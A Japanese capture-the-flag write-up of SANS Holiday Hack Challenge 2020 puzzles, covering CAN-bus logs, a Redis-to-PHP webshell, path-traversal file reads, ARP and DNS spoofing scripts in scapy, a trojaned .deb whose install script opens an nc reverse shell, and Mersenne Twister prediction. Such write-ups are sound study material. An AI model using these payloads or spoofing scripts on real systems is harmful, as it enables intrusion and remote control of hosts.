UNLOCKコマンドを探して、そのタイムスタンプをruntoanswerファイルを使って送信するっぽい。-
Can-Busについてはよくわからないので、Youtubeでお勉強。
どうやらログの#の前の文字はCanのIDのようなので、それに対して#以降のデータを送信して言うる感じっぽい。
探すのはアンロックなので、アンロックを行う対象のCan IDを探せばよい。
ログの内容が多いものは違うと考えられるので、除外してみてみる。
$ cat candump.log | grep -v 244# (1608926660.970738) vcan0 188#00000000 (1608926661.474018) vcan0 188#00000000 (1608926661.978259) vcan0 188#00000000 (1608926662.478577) vcan0 188#00000000 (1608926662.977733) vcan0 188#00000000 (1608926663.483216) vcan0 188#00000000 (1608926663.989726) vcan0 188#00000000 (1608926664.491259) vcan0 188#00000000 (1608926664.626448) vcan0 19B#000000000000 (1608926664.996093) vcan0 188#00000000 (1608926665.499007) vcan0 188#00000000 (1608926666.009926) vcan0 188#00000000 (1608926666.512371) vcan0 188#00000000 (1608926667.013385) vcan0 188#00000000 (1608926667.520201) vcan0 188#00000000 (1608926668.022800) vcan0 188#00000000 (1608926668.530024) vcan0 188#00000000 (1608926669.036851) vcan0 188#00000000 (1608926669.544057) vcan0 188#00000000 (1608926670.046480) vcan0 188#00000000 (1608926670.550541) vcan0 188#00000000 (1608926671.055065) vcan0 188#00000000 (1608926671.122520) vcan0 19B#00000F000000 (1608926671.558329) vcan0 188#00000000 (1608926672.063221) vcan0 188#00000000 (1608926672.568871) vcan0 188#00000000 (1608926673.072611) vcan0 188#00000000 (1608926673.579853) vcan0 188#00000000 (1608926674.086447) vcan0 188#00000000 (1608926674.092148) vcan0 19B#000000000000 (1608926674.589954) vcan0 188#00000000 (1608926675.099853) vcan0 188#00000000 (1608926675.605010) vcan0 188#00000000 (1608926676.110132) vcan0 188#00000000 (1608926676.617537) vcan0 188#00000000 (1608926677.121567) vcan0 188#00000000 (1608926677.630561) vcan0 188#00000000 (1608926678.141434) vcan0 188#00000000
188も別のものだと思われるが、19B#00000F000000が一つしかないし、アンロックと思われる。
$ ./runtoanswer 122520 Your answer: 122520 Checking.... Your answer is correct!
ということで回答は19B#00000F000000のタイムスタンプ122520
Sleigh CAN-D-Bus
端末問題を終えると、「サンタのそりにいたずらをされたようなのでそれを見つけてほしい。ただソリはサンタしか触れないので、今度君にも触れるようにサンタに頼んでおく。」みたいなことを言われる。
私はサンタになれるので、サンタになってソリを触ってみる。すると下記の画面が表示された。
ヒントも読むとブレーキを動かすと、変なコードが含まれる模様。
ブレーキを18に設定すると、080#000012(16進での18)以外に080#FFFFFDという用途のわからないデータが送られているのがわかる。
これを取り除けばよさそう。
080 Contains FFFFFとしたような記憶があるが、この記事を書いてる途中で試してみても特にクリアとかのメッセージが出なかったので、再確認できなかったし、自分のメモにも残っていなかった。不覚......
8) Broken Tag Generator
Difficulty: 🎄🎄🎄🎄 Help Noel Boetie fix the Tag Generator in the Wrapping Room. What value is in the environment variable GREETZ? Talk to Holly Evergreen in the kitchen for help with this.
Tag Generatorで使われている環境変数GREETZを見つけろという内容。ただその前にHolly Evergreenのもとへ行くとヒントがもらえるということで、端末問題を解きに行く
Redis Bug Hunt
Holly EvergreenのすぐそばにあるRedis Bug Hunt端末をクリアするとヒントがもらえそうなので解いていく。
index.phpの内容を表示させればよいっぽい。
We need your help!! The server stopped working, all that's left is the maintenance port. To access it, run: curl http://localhost/maintenance.php We're pretty sure the bug is in the index page. Can you somehow use the maintenance page to view the source code for the index page? $ curl http://localhost/maintenance.php ERROR: 'cmd' argument required (use commas to separate commands); eg: curl http://localhost/maintenance.php?cmd=help curl http://localhost/maintenance.php?cmd=mget,example1
いろいろわからなかったが、ペンテストっぽい内容と思い、ペンテストでRedis周りの攻撃方法ってないかなと思ったら見つかる。 そのページ紹介しようと思ったが、そのページ内のリンクから、サポート詐欺系に飛ばされるリンクがあったので、念のため載せておかないです。
まぁそれっぽいキーワードで検索すると見つかるので注意。 maintenance.phpを使ってPHPのWebshellを送り込んで実行してあげればよい。 多分コンソールに出力されるのがクリアの条件のようなので、最後に出力したファイルを表示させてクリア
$ curl http://localhost/maintenance.php?cmd=config,set,dir,/var/www/html
$ curl http://localhost/maintenance.php?cmd=config,set,dbfilename,web.php
$ curl http://localhost/maintenance.php?cmd=set,test,"%3C?php%20system(%24_GET%5B%22cmd%22%5D);%20?%3E"
$ curl http://localhost/maintenance.php?cmd=save
$ curl http://localhost/web.php?cmd=cat%20index.php --output out.txt
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 680 100 680 0 0 132k 0 --:--:-- --:--:-- --:--:-- 132k
$ cat out.txt
REDIS0009� redis-ver5.0.3�
�edis-bits�@�ctime�^�`�used-mem
aof-preamble���example2#We think there's a bug in index.phptest<?php
# We found the bug!!
#
# \ /
# .\-/.
# /\ () ()
# \/~---~\.-~^-.
# .-~^-./ | \---.
# { | } \
# .-~\ | /~-.
# / \ A / \
# \/ \/
#
echo "Something is wrong with this page! Please use http://localhost/maintenance.php to see if you can figur
e out what's going on"
?>
example1The site is in maintenance mode�z� �
Broken Tag Generator
画像を送信したりして、オリジナルタグを作ることができそうなサービスの環境変数を見つける。 サービスにアクセスすると下記の画面が表示される
ここからはBurp Suiteを使って解いていく。
Select fileで自分のローカルのファイルのアップロードが可能。ここでphpinfoのファイルをアップロードしようとすると、エラー画面が表示される
app/lib/app.rbでエラーが出力されることがわかる。
逆に画像ファイルをアップロードすると、レスポンスにリソースidっぽいものが確認できる。
ここで、JavaScriptを見てみると、アップロードした画像はimage?id={}という形式で取得していることがわかる。
ここにLFIを試してみる。
https://tag-generator.kringlecastle.com/image?id=../../../../app/lib/app.rbというリクエストを送る。Web画面上はエラーが表示されるだけだがBurpのレスポンスを見るとソースコードが出力されている。
しかし、目標はソースコードではなく、環境変数である。ソースコードにはそれっぽいことはなかった。
またいろいろ悩むが、プロセスの環境変数は/proc/{PID}/environで知ることができるらしい。ということでLFIで試してみる。
https://tag-generator.kringlecastle.com/image?id=../../../proc/self/environを送るとGREETZ=JackFrostWasHereと返ってくる。これが答え
9) ARP Shenanigans
個人的に一番楽しかった問題。
Difficulty: 🎄🎄🎄🎄 Go to the NetWars room on the roof and help Alabaster Snowball get access back to a host using ARP. Retrieve the document at /NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt. Who recused herself from the vote described on the document?
Alabaster Snowballの近くに行くとScapy PrepperとARP shenanigansがあり、前の問題とかと同じように、端末問題がメイン問題のヒントとなっている構成。
まずはScapy Prepperを解いていく
Scapy Prepper
これは、scapyというパケット作成するPythonのライブラリに関する問題のよう。task.get()でタスクを入手し、task.sbumit()を使って送信していく。
リファレンス等を参照しながらひたすら問題にこたえていく。この問題に関してはヒントももらえるので、解答だけずらっと書きます。 実際はいろいろ調べながらやりました。
>>> task.get()
Welcome to the "Present Packet Prepper" interface! The North Pole could use your help preparing present pack
ets for shipment.
Start by running the task.submit() function passing in a string argument of 'start'.
Type task.help() for help on this question.
>>> task.submit('start')
Correct! adding a () to a function or class will execute it. Ex - FunctionExecuted()
Submit the class object of the scapy module that sends packets at layer 3 of the OSI model.
>>> task.submit(send)
Correct! The "send" scapy class will send a crafted scapy packet out of a network interface.
Submit the class object of the scapy module that sniffs network packets and returns those packets in a list.
>>> task.submit(scapy.sendrecv.sniff)
Correct! the "sniff" scapy class will sniff network traffic and return these packets in a list.
Submit the NUMBER only from the choices below that would successfully send a TCP packet and then return the
first sniffed response packet to be stored in a variable named "pkt":
1. pkt = sr1(IP(dst="127.0.0.1")/TCP(dport=20))
2. pkt = sniff(IP(dst="127.0.0.1")/TCP(dport=20))
3. pkt = sendp(IP(dst="127.0.0.1")/TCP(dport=20))
>>> task.submit(1)
Correct! sr1 will send a packet, then immediately sniff for a response packet.
Submit the class object of the scapy module that can read pcap or pcapng files and return a list of packets.
>>> task.submit(scapy.utils.rdpcap)
Correct! the "rdpcap" scapy class can read pcap files.
The variable UDP_PACKETS contains a list of UDP packets. Submit the NUMBER only from the choices below that
correctly prints a summary of UDP_PACKETS:
1. UDP_PACKETS.print()
2. UDP_PACKETS.show()
3. UDP_PACKETS.list()
>>> task.submit(2)
Correct! .show() can be used on lists of packets AND on an individual packet.
Submit only the first packet found in UDP_PACKETS.
>>> task.submit(UDP_PACKETS[0])
Correct! Scapy packet lists work just like regular python lists so packets can be accessed by their position
in the list starting at offset 0.
Submit only the entire TCP layer of the second packet in TCP_PACKETS.
>>> task.submit(TCP_PACKETS[1].getlayer(TCP))
Correct! Most of the major fields like Ether, IP, TCP, UDP, ICMP, DNS, DNSQR, DNSRR, Raw, etc... can be acce
ssed this way. Ex - pkt[IP][TCP]
Change the source IP address of the first packet found in UDP_PACKETS to 127.0.0.1 and then submit this modi
fied packet
>>> pkt = UDP_PACKETS[0]
>>> pkt[IP].src = "127.0.0.1"
>>> task.submit(pkt)
Correct! You can change ALL scapy packet attributes using this method.
Submit the password "task.submit('elf_password')" of the user alabaster as found in the packet list TCP_PACK
ETS.
>>> task.submit('echo')
Correct! Here is some really nice list comprehension that will grab all the raw payloads from tcp packets:
[pkt[Raw].load for pkt in TCP_PACKETS if Raw in pkt]
The ICMP_PACKETS variable contains a packet list of several icmp echo-request and icmp echo-reply packets. S
ubmit only the ICMP chksum value from the second packet in the ICMP_PACKETS list.
>>> task.submit(ICMP_PACKETS[1][ICMP].chksum)
Correct! You can access the ICMP chksum value from the second packet using ICMP_PACKETS[1][ICMP].chksum .
Submit the number of the choice below that would correctly create a ICMP echo request packet with a destinat
ion IP of 127.0.0.1 stored in the variable named "pkt"
1. pkt = Ether(src='127.0.0.1')/ICMP(type="echo-request")
2. pkt = IP(src='127.0.0.1')/ICMP(type="echo-reply")
3. pkt = IP(dst='127.0.0.1')/ICMP(type="echo-request")
>>> task.submit(3)
Correct! Once you assign the packet to a variable named "pkt" you can then use that variable to send or mani
pulate your created packet.
Create and then submit a UDP packet with a dport of 5000 and a dst IP of 127.127.127.127. (all other packet
attributes can be unspecified)
>>> pkt = IP(dst='127.127.127.127')/UDP(dport=5000)
>>> task.submit(pkt)
Correct! Your UDP packet creation should look something like this:
pkt = IP(dst="127.127.127.127")/UDP(dport=5000)
task.submit(pkt)
Create and then submit a UDP packet with a dport of 53, a dst IP of 127.2.3.4, and is a DNS query with a qna
me of "elveslove.santa". (all other packet attributes can be unspecified)
>>> pkt1 = IP(dst='127.2.3.4')/UDP(dport=53)/DNS(rd=1,qd=DNSQR(qname= "elveslove.santa"))
>>> task.submit(pkt1)
Correct! Your UDP packet creation should look something like this:
pkt = IP(dst="127.2.3.4")/UDP(dport=53)/DNS(rd=1,qd=DNSQR(qname="elveslove.santa"))
task.submit(pkt)
The variable ARP_PACKETS contains an ARP request and response packets. The ARP response (the second packet)
has 3 incorrect fields in the ARP layer. Correct the second packet in ARP_PACKETS to be a proper ARP respons
e and then task.submit(ARP_PACKETS) for inspection.
>>> ARP_PACKETS[1][ARP].hwsrc = "00:13:46:0b:22:ba"
>>> ARP_PACKETS[1][ARP].hwdst = "00:16:ce:6e:8b:24"
>>> ARP_PACKETS[1][ARP].op = 2
>>> task.submit(ARP_PACKETS)
Great, you prepared all the present packets!
Congratulations, all pretty present packets properly prepared for processing!
ARP Shenanigans
本番問題。起動するとメッセージが表示される。HELP.mdを見ると使い方を教えてくれる。
Jack Frost has hijacked the host at 10.6.6.35 with some custom malware. Help the North Pole by getting command line access back to this host. Read the HELP.md file for information to help you in this endeavor. Note: The terminal lifetime expires after 30 or more minutes so be sure to copy off any essential work you have done as you go. # How To Resize and Switch Terminal Panes: You can use the key combinations ( Ctrl+B ↑ or ↓ ) to resize the terminals. You can use the key combinations ( Ctrl+B o ) to switch terminal panes. See tmuxcheatsheet.com for more details # To Add An Additional Terminal Pane: `/usr/bin/tmux split-window -hb` # To exit a terminal pane simply type: `exit` # To Launch a webserver to serve-up files/folder in a local directory: cd /my/directory/with/files python3 -m http.server 80 # A Sample ARP pcap can be viewed at: https://www.cloudshark.org/captures/d97c5b81b057 # A Sample DNS pcap can be viewed at: https://www.cloudshark.org/captures/0320b9b57d35 # If Reading arp.pcap with tcpdump or tshark be sure to disable name # resolution or it will stall when reading: tshark -nnr arp.pcap tcpdump -nnr arp.pcap
先にこの問題を解説すると、下記の流れである。 * tcpdumpをするとARPリクエストが飛んでくるので、arpリクエストを返す。 * arpリクエストを返すと、DNSリクエストが飛んでくるのでDNSを自分のホストになるように返す。 * DNSリクエストを返すと、ftpの通信でdebファイルを取得しようとしてくる。 * 細工したdebファイルを用意して、リバースシェルを張る
実際の時はそれぞれを試した結果、変化があったのでそれに対応するリクエストを返すものを作った。 ということでこの先はそのようなリクエストを返すファイル作成である。
まずはarpのレスポンス、macaddressとプライベートIPはきどうするたび変わるので適宜直す必要がある。
#!/usr/bin/python3
from scapy.all import *
import netifaces as ni
import uuid
# Our eth0 ip
ipaddr = ni.ifaddresses('eth0')[ni.AF_INET][0]['addr']
# Our eth0 mac address
macaddr = ':'.join(['{:02x}'.format((uuid.getnode() >> i) & 0xff) for i in range(0,8*6,8)][::-1])
def handle_arp_packets(packet):
# if arp request, then we need to fill this out to send back our mac as the response
if ARP in packet and packet[ARP].op == 1:
ether_resp = Ether(dst="4c:24:57:ab:ed:84", type=0x806, src="02:42:0a:06:00:03")
arp_response = ARP(pdst="10.6.6.35")
arp_response.op = 2
arp_response.plen = 4
arp_response.hwlen = 6
arp_response.ptype = 0x800
arp_response.hwtype = 0x1
arp_response.hwsrc = "02:42:0a:06:00:03"
arp_response.psrc = "10.6.6.53"
arp_response.hwdst = "4c:24:57:ab:ed:84"
arp_response.pdst = "10.6.6.35"
response = ether_resp/arp_response
sendp(response, iface="eth0")
def main():
# We only want arp requests
berkeley_packet_filter = "(arp[6:2] = 1)"
# sniffing for one packet that will be sent to a function, while storing none
sniff(filter=berkeley_packet_filter, prn=handle_arp_packets, store=0, count=1)
if __name__ == "__main__":
main()
DNSレスポンス
#!/usr/bin/python3
from scapy.all import *
import netifaces as ni
import uuid
# Our eth0 IP
ipaddr = ni.ifaddresses('eth0')[ni.AF_INET][0]['addr']
# Our Mac Addr
macaddr = ':'.join(['{:02x}'.format((uuid.getnode() >> i) & 0xff) for i in range(0,8*6,8)][::-1])
# destination ip we arp spoofed
ipaddr_we_arp_spoofed = "10.6.6.53"
def handle_dns_request(packet):
# Need to change mac addresses, Ip Addresses, and ports below.
# We also need
org_ip = packet[IP]
org_udp = packet[UDP]
org_dns = packet[DNS]
eth = Ether(src="02:42:0a:06:00:03", dst="4c:24:57:ab:ed:84") # need to replace mac addresses
ip = IP(dst=org_ip.src, src=org_ip.dst) # need to replace IP addresses
udp = UDP(dport=org_udp.dport, sport=53) # need to replace ports
dns = DNS(
# MISSING DNS RESPONSE LAYER VALUES
id=org_dns.id,ancount=1,qr=1,qd=org_dns.qd,an=DNSRR(rrname=org_dns.qd.qname, type='A',rdata="10.6.0.3")
)
dns_response = eth / ip / udp / dns
sendp(dns_response, iface="eth0")
def main():
berkeley_packet_filter = " and ".join( [
"udp dst port 53", # dns
"udp[10] & 0x80 = 0", # dns request
"dst host {}".format(ipaddr_we_arp_spoofed), # destination ip we had spoofed (not our real ip)
"ether dst host {}".format(macaddr) # our macaddress since we spoofed the ip to our mac
] )
# sniff the eth0 int without storing packets in memory and stopping after one dns request
sniff(filter=berkeley_packet_filter, prn=handle_dns_request, store=0, iface="eth0", count=1)
if __name__ == "__main__":
main()
debファイルを改ざんして、リバースシェルを張る。 これはヒントにあったサイトを参考にして作る ヒント先では、msfvenomを使ってペイロードを作成しているが、今回はリバースシェルを張れればいいので、改ざんする.debファイルはncのファイル。そしてncでリバースシェルを仕込むように変更する。
#!/bin/sh
set -e
if [ "$1" = "configure" ]; then
update-alternatives \
--install /bin/nc nc /bin/nc.traditional 10 \
--slave /bin/netcat netcat /bin/nc.traditional \
--slave /usr/share/man/man1/nc.1.gz nc.1.gz \
/usr/share/man/man1/nc.traditional.1.gz \
--slave /usr/share/man/man1/netcat.1.gz netcat.1.gz \
/usr/share/man/man1/nc.traditional.1.gz
fi
nc 10.6.0.3 4444 -e /bin/bash
ここまで用意したら.debファイルを作成し、リクエストに合うようにフォルダを構成してあげる。そしてnc -lpv 4444で待ち受ければよい。
適切に実行できるとリバースシェルが接続できる。問題は/NORTH_POLE_Land_Use_Board_Meeting_Minutes.txtファイルの中から投票を拒否した人を探せばよい。
catコマンドで見てみる。
Tanta Kringle recusedという内容があるので答えはTanta Kringle
NORTH POLE │
LAND USE BOARD │
MEETING MINUTES │
│
January 20, 2020 │
│
Meeting Location: All gathered in North Pole Municipal Building, 1 Santa Claus Ln, North Pole │
│
Chairman Frost calls meeting to order at 7:30 PM North Pole Standard Time.
Chairman Frost made the required announcement concerning the Open Public Meetings Act: Adequate notice of this meeting has been│
made -- displayed on the bulletin board next to the Pole, listed on the North Pole community website, and published in the Nor│
th Pole Times newspaper -- for people who are interested in this meeting. │
│
Review minutes for December 2020 meeting. Motion to accept – Mrs. Donner. Second – Superman. Minutes approved. │
│
OLD BUSINESS: No Old Business. │
│
RESOLUTIONS: │
The board took up final discussions of the plans presented last year for the expansion of Santa’s Castle to include new courtya│
rd, additional floors, elevator, roughly tripling the size of the current castle. Architect Ms. Pepper reviewed the planned ch│
anges and engineering reports. Chairman Frost noted, “These changes will put a heavy toll on the infrastructure of the North Po│
le.” Mr. Krampus replied, “The infrastructure has already been expanded to handle it quite easily.” Chairman Frost then noted│
, “But the additional traffic will be a burden on local residents.” Dolly explained traffic projections were all in alignment │
with existing roadways. Chairman Frost then exclaimed, “But with all the attention focused on Santa and his castle, how will p│
eople ever come to refer to the North Pole as ‘The Frostiest Place on Earth?’” Mr. In-the-Box pointed out that new tourist-fri│
endly taglines are always under consideration by the North Pole Chamber of Commerce, and are not a matter for this Board. Mrs.│
Nature made a motion to approve. Seconded by Mr. Cornelius. Tanta Kringle recused herself from the vote given her adoption o│
f Kris Kringle as a son early in his life. │
│
Approved: │
Mother Nature │
Superman │
Clarice │
Yukon Cornelius │
Ginger Breaddie │
King Moonracer │
Mrs. Donner │
Charlie In the Box │
Krampus │
Dolly │
Snow Miser │
Alabaster Snowball │
Queen of the Winter Spirits │
│
Opposed: │
Jack Frost │
│
Resolution carries. Construction approved. │
│
NEW BUSINESS: │
│
Father Time Castle, new oversized furnace to be installed by Heat Miser Furnace, Inc. Mr. H. Miser described the plan for inst│
alling new furnace to replace the faltering one in Mr. Time’s 20,000 sq ft castle. Ms. G. Breaddie pointed out that the propose│
d new furnace is 900,000,000 BTUs, a figure she considers “incredibly high for a building that size, likely two orders of magni│
tude too high. Why, it might burn the whole North Pole down!” Mr. H. Miser replied with a laugh, “That’s the whole point!” T│
he board voted unanimously to reject the initial proposal, recommending that Mr. Miser devise a more realistic and safe plan fo│
r Mr. Time’s castle heating system. │
│
│
Motion to adjourn – So moved, Krampus. Second – Clarice. All in favor – aye. None opposed, although Chairman Frost made anothe│
r note of his strong disagreement with the approval of the Kringle Castle expansion plan. Meeting adjourned.
10) Defeat Fingerprint Sensor
Difficulty: 🎄🎄🎄 Bypass the Santavator fingerprint sensor. Enter Santa's office without Santa's fingerprint.
Santavatorのサンタの部屋に入るための指紋認証を突破せよとのこと。これはサンタになれるので、サンタの時とサンタじゃないときのリクエストを見比べれば答えがわかりそう。
サンタの時と、サンタじゃないときではリクエストが微妙に違い、besantaというパラメータを持っていた。
あとはiframeで読み込んでいる部分にbesantaと加えてからクリックすればOK。
11a) Naughty/Nice List with Blockchain Investigation Part 1
Difficulty: 🎄🎄🎄🎄🎄 Even though the chunk of the blockchain that you have ends with block 129996, can you predict the nonce for block 130000? Talk to Tangle Coalbox in the Speaker UNpreparedness Room for tips on prediction and Tinsel Upatree for more tips and tools. (Enter just the 16-character hex value of the nonce)
10の問題でサンタの状態でサンタの部屋に入ると、Naughty/Niceリストのデータファイルが手に入る(ファイル名はblockhain.dat)
このブロックチェーンのデータに関する問題。まぁその前にTangle Coalboxのもとへ行くとヒントがあるというので、端末問題を解きに行く。
Snowball Fight
自分と相手がフィールドの中に的を持っており先に当てたら勝利というゲーム。 easyは適当にやって勝てるが、Impossibleは相手が外すことはないので、先手のこちらが外してはダメという感じ。
Impossibleモードのソースコードを確認すると大量の数字が発見できる。 ヒントからPythonのランダムモジュールを使ってることがわかるので、メルセンヌツイスタで生成。表示される大量の数字は内部状態生成のためと考えられる。
<!--
Seeds attempted:
646982050 - Not random enough
860190093 - Not random enough
2195852736 - Not random enough
2563904612 - Not random enough
729049201 - Not random enough
2470307167 - Not random enough
463691275 - Not random enough
3638917918 - Not random enough
518057808 - Not random enough
メルセンヌツイスタの予測に関しては、ももいろテクノロジーさんがやり方を書いてあったなと思い。参考にしながら作成。
Impossibleのゲーム盤面のシードがわかったら、難易度easyの名前を見つけたシードにして表示させると同じ盤面が表示される。
あとはeasyでクリアした後に、Impossibleで間違えないようにあてていけばクリア
11a問題
ブロックチェインは129996まである、130000のnonceを予測せよという問題。
Snowball FIghtをクリアするとヒントからOfficialNaughtyNiceBlockchainEducationPack.zipをもらえる
blockhain.datをパースするためのスクリプトnaughty_nice.pyが渡される。これを使うとnonceがわかる。
このnonceは64bitなので、注意して予測する必要がある。 またメルセンヌツイスタの内部状態は624でリセットされる、今回は64bitなので312回で切り替わることに注意してコードを書く。
def untemper(x):
x = unBitshiftRightXor(x, 18)
x = unBitshiftLeftXor(x, 15, 0xefc60000)
x = unBitshiftLeftXor(x, 7, 0x9d2c5680)
x = unBitshiftRightXor(x, 11)
return x
def unBitshiftRightXor(x, shift):
i = 1
y = x
while i * shift < 32:
z = y >> shift
y = x ^ z
i += 1
return y
def unBitshiftLeftXor(x, shift, mask):
i = 1
y = x
while i * shift < 32:
z = y << shift
y = x ^ (z & mask)
i += 1
return y
if __name__ == '__main__':
with open('private.pem', 'rb') as fh:
private_key = RSA.importKey(fh.read())
public_key = private_key.publickey()
c1 = Chain()
count = c1.load_chain()
value1 = [0 for i in range(312)]
index=0
for i in range(count+1):
if i == 1248:
break
if index < 312:
value1[index] = c1.blocks[i].nonce
index += 1
if index == 312:
index = 0
mt_state = []
print(count)
for x in value1:
mt_state.append(untemper(x & 0xffffffff))
mt_state.append(untemper(x >> 32))
mt_state.append(624)
random.setstate((3,tuple(mt_state),None))
predicted1 = [random.getrandbits(64) for i in range(305)]
print("predicted")
print(hex(predicted1[305]))
出力される0x57066318f32f729dが答え
11b) Naughty/Nice List with Blockchain Investigation Part 2
Difficulty: 🎄🎄🎄🎄🎄 The SHA256 of Jack's altered block is: 58a3b9335a6ceb0234c12d35a0564c4e f0e90152d0eb2ce2082383b38028a90f. If you're clever, you can recreate the original version of that block by changing the values of only 4 bytes. Once you've recreated the original block, what is the SHA256 of that block?
Jack Frostがブロックチェーンの一部を変更した、4バイト修正して、元のブロックのSHA256を答えよという問題。
まずはJackが変更したブロックを見つける。空白があるが、空白をつなげたSHA256のハッシュ。
import hashlib
if __name__ == '__main__':
with open('private.pem', 'rb') as fh:
private_key = RSA.importKey(fh.read())
public_key = private_key.publickey()
c1 = Chain()
count = c1.load_chain()
value1 = [0 for i in range(312)]
index=0
for i in range(count):
if hashlib.sha256(c1.blocks[i].block_data_signed()).hexdigest() == "58a3b9335a6ceb0234c12d35a0564c4ef0e90152d0eb2ce2082383b38028a90f":
print(i)
break
----
出力
1011
Chain Index: 129459
Nonce: a9447e5771c704f4
PID: 0000000000012fd1
RID: 000000000000020f
Document Count: 2
Score: ffffffff (4294967295)
Sign: 1 (Nice)
Data item: 1
Data Type: ff (Binary blob)
Data Length: 0000006c
Data: b'ea465340303a6079d3df2762be68467c27f046d3a7ff4e92dfe1def7407f2a7b73e1b759b8b919451e37518d22d987296fcb0f188dd60388bf20350f2a91c29d0348614dc0bceef2bcadd4cc3f251ba8f9fbaf171a06df1e1fd8649396ab86f9d5118cc8d8204b4ffe8d8f09'
Data item: 2
Data Type: 05 (PDF)
Data Length: 00009f57
Data: b'255044462d312e330a2525c1cec7c5210a0a312030206f626a0a3c3c2f547970652f436174616c6f672f5f476f5f417761792f53616e74612f506167657320322030205220202020202030f9d9bf578e3caae50d788fe760f31d64afaa1ea1f2a13d63753e1aa5bf80624fc346bfd667caf7499591c40201edab03b9ef95991c5b499f86dc8539859099ad54b01e733fe5a7a489b93295ff5468034d497938e8f9b8cb3ac3cf50f01b325b9b17747595422b7378f02502e1a9b0ac8528017a9e0a3e3e0a656e646f626a0a0a322030206f626a0a3c3c2f547970652f50616765732f436f756e7420312f4b6964735b3233203020525d3e3e0a656e646f626a0a0a332030206f626a0a3c3c2f547970652f50616765732f436f756e7420312f4b6964735b3135203020525d3e3e0a656e646f626a0a0a342030206f626a0a3c3c2f4c656e67746820323234332f46696c7465722f466c6174654465636f64653e3e0a73747265616d0a789c9d59c98ae44610bdf757d4d9d0e55c9429090a816a3bf86668f061f0cd0bf860b02ffe7dc79e9152b5da78869eaa96728988f7e245644e38c7d33f6f7f9dc2299c439a4e35c6f33cc6d338f3e7dfbfbefdf4dde94f1e017ffffefdedfaf156ea1986a6f15c4e1fbf9cbe7fc6534ca78fdf2e212e1f7fbc3d3ede7edc4ca8e99cfc84c413bee18c740929e4e51d3e07fca52cefe512ea122ff2740c133e9fc30a03af4b8117377878879f070d48e129836280e9f0849f8f31f292734cb85c5dde2b3ecdf84b8a037cf08b31167a95973ce3463c9d761d69985a063b547c17e3f23ea265f4c80c1c61a751b781efbc027c99d5155e2dc5951d143be1c108de8d6200be8a571e91606d8bc7ca765cc50fb29d2c105778df043fcf302f93194babc0979b580da15b7efef8e115520c6dcce7718bd48acee1a2f72586e92276b11560fe4c203c0101d90c86e54c2ec6702193081a816914a8c4440d840c8195dd7c7ad310e8b00c1cadcd600801079fc2f65cdea78bb1850c9823fce1dd3a20e81316c5e80966e2678333d95264ce13e6a70078a51e06c31c0657e42079cadb39aec631de3d309fc5793347763984b1ccf379dec228cb9019c4930d49e86172cc1ccce0199e0f644d47c310bb68353421c4b3997fd73cae964f83bcba32d16f1dfe6c072eacab71fc664b12da3d45e01e031e1bc13c929afd23807e8db04982d8458d01cdb698b043af55e3b50e58a066f255f74fc7c04c1574f70818af139ad55dcce897042ead8e474c1893135da4091dcfde0ef7a9859b09370eb090cf8ed35e8f607b61b4660d440a689db208f698fa108381884ca1afa93633b21306c44a76bcb289ad60b874475148a93aec5cada8b6dff855f68ce99cb720ed53d92bfe93f8b60b96209b4c32956054d3248dd47309218d8837fcfb99952907609133d3ca70faa40cb35f65dad5edfcc9841ccaa90c83168368711858ff428520324bb07c923f153c4af8cb8df00b77cc3688053cc3f84c18fb18724c91b12d9117a385569a15b907a039f47b85f1f4be861a27d98e569ae903e8760865c89b187dbb406a6510ed1b536f625b575ef486d015d9e12eba8685c4bc8a1a805527a3b16c772c667700298c161e5a17c3c0332aa54866c76fce19591d5b00d99d160ff129a3e18d465cde3c168b315b1d38ff1a1210fa27215421e2fc5d96ba492949ba1e7c47ef330caabc1ad99382eda72e7054126f8666576f753e046598e60d0fbf5d9a49d1ac489116231fd04dc03fb38423d9b0502a7fd4e8892924718334118a6017202b0ba2344a9ab9dc31f0c6118e65f1e0330779f852606ba1b0b722f9ad9a1912e6ccc2d791be5fd79938da3cf35c23f4e0b68fc2cce81789c044fd0891bbb938e3dacd192198cc577e3cb8aadb9e381c2439c35aab8617a02de2daf05f401ecb5e3c98ebc0768b904b78a4792ac78b0e9396cf2e9d3b00256093348018d963d654eeb9b86b683923a0b8bc91e8abccb1d1b2435d8a09531f44d21b02aa529558e9736cf4921cb2c535dc9aff8abc9300d22c562c9add0940273de60e31a38917dae1a8a400685ed4f162c9ad1b1e439387bdd20e4d41e99fabe3ae505f2d7c342d2aae14883d10e0ac6e7be1e37c932ce59cef32bbc55d18c2f26ec1477cd2d8acd4a07a29d5a89151b111e8a58c4ab0d2e42b428e6c9c6a0b4cbd2e6dcbe6bf22b7cbd32e56445a5aefe9fd71f53363c7ab25babeb6f418cd147612bd1179d3a05e92e05c2f92945c9c19280353cbed93be984de606768b5eb542f2647e984c12ed015d295308e6ac716ef871b0abeda5dbabe2a1792018bcb1e02619e00025d5ef74d321fca25c5f7d7b6440149f13dbd8b9fe616e55bce22582ad700c5ba83bd18d2a0b02842fb142c01795451142f5e32463d6a4d5529171a0d59a57da0d62b4b92dd0b670137b57482a9e402562d4203289a5316a319018e37058a2a59ce6b8f6980fdfd67405b6d3cf2502c2d765c8d22d2469573981ae1a2e9589c3c0e771de15a64e57fe978678ca69acc0a29552a8b5760a2dcb200ec47b974699269d989bbe3bb022d70a2707132b5e63a065c60b8837b4f1096a9dbccf503af679cddd6456a7bf5ddca4c8f550fa7e312ae548fb4ae7e1317ab5ec6b97936c4b55dce6baa48e4adcdb49597a6ab6f9262fd5e6438121579e1cd30d69574538504b4cfe51c13506ad9b9079f4b27615c2953e21ac942ecbc2427d57ddca4fb3bfef9d3b1c3a466d9bf44c06096daa1dcb5c33aba22826bd6a6cac1c42d371885489ffe9e81057aac0c90ab0668f6de44f2b61d604b248e750359e0c2c19bf390e5061af425aaf68ed10893942fd47d73c2a3c2441f7cefce41282828e37432a0cb8dbe644a8daa627dad988931e1c0761acc81da0258717f8b7b4afd37c494fba5ffb2257f2b82f31835ccd5839dd56fe9e3bd466d72e3fe1ac57bba3de17270108cb4e70734087984e5640380c7739563f8c127a325f8d91303c34b9e5676be3e986c62f8b262419f50c6b2ba0ae17f77ae28557d3677b28dadcaa5c7d5feb9248ef0ebac3ad75265d47b2aff93e6988a7f2ba8679277271e6d5662f71760c3a422bcd7527b028d15241aa3f473745ea0efedd69ab2fe422a15568870cc8918a79752da465c860490fc1cdc93aeee06b2117d67b13ee3da1f79d5b938169cb1627a758bf8d909b2643eaa229532bc79c2c9f360cfeeae28b0c4e53daf7f63bf5109